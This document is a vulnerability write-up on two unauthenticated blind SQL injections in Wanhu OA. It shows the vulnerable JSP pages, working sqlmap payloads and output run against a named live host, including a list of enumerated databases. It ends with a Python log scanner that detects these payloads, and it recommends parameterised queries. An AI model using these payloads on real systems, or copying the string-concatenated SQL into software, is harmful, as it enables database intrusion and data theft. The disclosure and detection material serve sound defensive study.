Wanhu OA: two blind SQL injections with DBA privileges (no login required)

First, the time-based blind injection, which affects both the Standard and Professional editions. Injection point: /defaultroot/outMailLoginCheck.jsp

```jsp
<%@ page contentType="text/html; charset=GBK"%>
<%
// Dun'an external mail login check
com.whir.common.util.DataSourceBase dsb = new com.whir.common.util.DataSourceBase();
try{
    java.sql.Connection conn = dsb.getDataSource().getConnection();
    java.sql.Statement stmt = conn.createStatement();
    // Both request parameters are concatenated straight into the SQL text
    // (plain Statement, no bound parameters), so userAccount and outMailRandom
    // are both injectable without authentication.
    java.sql.ResultSet rs = stmt.executeQuery("SELECT * FROM EZOFFICE.OA_MAILLOGIN WHERE USERACCOUNT='" + request.getParameter("userAccount") + "' AND RANDOM='" + request.getParameter("outMailRandom") + "'");
    if(rs.next()){
        out.print(true);
    }else{
        out.print(false);
    }
    conn.close();
}catch(Exception e){}
%>
```

This is obviously a blind injection. Because the OA_MAILLOGIN table is empty by default, rs.next() never succeeds and the true/false output gives no usable boolean oracle, so only the slower time-based blind technique remains; sqlmap is therefore run with technique=T directly.

Trying the Standard edition first:

http://oa.frjt.net:8081/defaultroot/outMailLoginCheck.jsp?userAccount=&outMailRandom=

```
sqlmap identified the following injection points with a total of 125 HTTP(s) requests:
---
Place: GET
Parameter: userAccount
    Type: AND/OR time-based blind
    Title: MySQL < 5.0.12 AND time-based blind (heavy query)
    Payload: userAccount=' AND 4843=BENCHMARK(5000000,MD5(0x4758714c)) AND 'YsEW'='YsEW&outMailRandom=
---
web application technology: JSP
back-end DBMS: MySQL >= 5.0.0
```

Then the Professional edition:
Proof of vulnerability:

Next is the boolean-based blind injection, which exists only in the Standard edition. Injection point: /defaultroot/synccustomize_simple.jsp

```jsp
<%-- Page directives and imports (DbOpt, java.sql.SQLException) were omitted in the original post. --%>
<%
String flag=request.getParameter("flag");
String menuname = request.getParameter("menuname");
if("sync".equals(flag)){
    // data
    String s_String = "";
    int s_int = 0;
    String[][] res = null;
    DbOpt dbopt = null;
    try {
        dbopt = new DbOpt();
        String Sql = "";
        // menuname is concatenated unescaped into both queries below
        Sql = "select MENU_id,MENULEVEL,MENUVIEW,MENUVIEWUSER,MENUVIEWORG,MENUVIEWGROUP,MENUPARENT,MENUURL,MENUORDER,DESKTOP1,DESKTOP2,menuIdString,isSystemInit,INUSE,LEFTURL,RIGHTURL,MENUCODE,menuname from OA_MENUSET where menuname='"+menuname+"' ";
        res = dbopt.executeQueryToStrArr2(Sql,18);
        if(res != null){
            String _cnt = dbopt.executeQueryToStr("Select count(*) from oa_custmenu where menu_name='"+menuname+"' ");
            s_int = Integer.parseInt(_cnt);
            .......
        }else if(s_int>1){
            // message text: "<s_int> rows found, not processed!"
            s_String = "查出"+s_int+"条数据,未处理!";
        }
    }
    dbopt.close();
} catch (Exception e) {
    e.printStackTrace();
} finally {
    try {
        dbopt.close();
    } catch (SQLException ex) {
    }
}
%>
</table>
<table width="100%" border="0" cellpadding="0" cellspacing="0" class="pagebar">
<tr>
<!-- s_String is echoed into the page, so the response body depends on whether the injected query matched -->
<td><%=s_String%> </td>
```

Boolean-based blind injection works here; with a few more threads the speed is perfectly fine. Verification:

http://oa.frjt.net:8081/defaultroot/synccustomize_simple.jsp?flag=sync&menuname=%E8%AE%BA%E5%9D%9B

```
web application technology: JSP
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: menuname
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: flag=sync&menuname=%E8%AE%BA%E5%9D%9B' AND 8760=8760 AND 'pBAh'='pBAh
---
web application technology: JSP
back-end DBMS: MySQL >= 5.0.0
available databases [3]:
[*] ezoffice
[*] information_schema
[*] mysql
```
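As an added example (not part of the original post and not Wanhu OA's own code), the following Python script shows how a defender would spot both request shapes described above in web-server access logs: the BENCHMARK heavy-query payload against outMailLoginCheck.jsp (time-based, first section) and the AND n=n tautology against synccustomize_simple.jsp (boolean-based, this section). The log lines, client addresses and timestamps are constructed for the example; the endpoint paths and parameter names are the ones from the post.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample access-log lines (hypothetical, not taken from the original post).
# Two benign requests and two carrying the injection shapes from the sqlmap output above.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2015:10:00:01 +0800] "GET /defaultroot/outMailLoginCheck.jsp?userAccount=zhang&outMailRandom=1234 HTTP/1.1" 200 5
10.0.0.5 - - [01/Jan/2015:10:00:02 +0800] "GET /defaultroot/outMailLoginCheck.jsp?userAccount=%27%20AND%204843%3DBENCHMARK%285000000%2CMD5%280x4758714c%29%29%20AND%20%27YsEW%27%3D%27YsEW&outMailRandom= HTTP/1.1" 200 5
10.0.0.7 - - [01/Jan/2015:10:00:03 +0800] "GET /defaultroot/synccustomize_simple.jsp?flag=sync&menuname=%E8%AE%BA%E5%9D%9B HTTP/1.1" 200 812
10.0.0.7 - - [01/Jan/2015:10:00:04 +0800] "GET /defaultroot/synccustomize_simple.jsp?flag=sync&menuname=%E8%AE%BA%E5%9D%9B%27%20AND%208760%3D8760%20AND%20%27pBAh%27%3D%27pBAh HTTP/1.1" 200 812
"""

# Common Log Format: client ident user [time] "method target protocol" status size
LOG_LINE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Endpoints from the post and the parameters each one concatenates into SQL.
WATCHED_PARAMS = {
    "/defaultroot/outMailLoginCheck.jsp": ("userAccount", "outMailRandom"),
    "/defaultroot/synccustomize_simple.jsp": ("menuname",),
}

# Heavy-query / sleep functions: the time-based technique delays the response.
TIME_BASED = re.compile(r"\b(?:BENCHMARK|SLEEP)\s*\(", re.I)
# Tautologies such as AND 8760=8760 or 'pBAh'='pBAh: the boolean-based technique
# changes the page content rather than the response time.
TAUTOLOGY_NUM = re.compile(r"\b(?:AND|OR)\s+(\d+)\s*=\s*\1\b", re.I)
TAUTOLOGY_STR = re.compile(r"'(\w+)'\s*=\s*'\1(?!\w)")


def classify_value(value):
    """Return 'time-based', 'boolean-based' or None for one decoded parameter value."""
    if TIME_BASED.search(value):
        return "time-based"
    if TAUTOLOGY_NUM.search(value) or TAUTOLOGY_STR.search(value):
        return "boolean-based"
    return None


def scan_log(text):
    """Return one finding per watched parameter whose decoded value looks like blind SQLi."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        params = WATCHED_PARAMS.get(parts.path)
        if not params:
            continue
        # keep_blank_values so an empty outMailRandom= still appears in the dict
        query = parse_qs(parts.query, keep_blank_values=True)
        for name in params:
            for value in query.get(name, []):
                kind = classify_value(value)
                if kind:
                    findings.append({
                        "client": m.group("client"),
                        "time": m.group("time"),
                        "path": parts.path,
                        "param": name,
                        "kind": kind,
                        "value": value,
                    })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['client']} {f['path']} {f['param']}: {f['kind']} -> {f['value']!r}")
```

The script decodes the query string before matching, because the payloads arrive percent-encoded and a raw substring match on the log line would miss them. For the heavy-query variant, a server that logs request duration gives a stronger signal than the payload text alone: repeated multi-second responses from outMailLoginCheck.jsp are out of place for a page that only prints true or false. The root-cause fix for both pages is to bind userAccount, outMailRandom and menuname through java.sql.PreparedStatement placeholders instead of concatenating them into the SQL string.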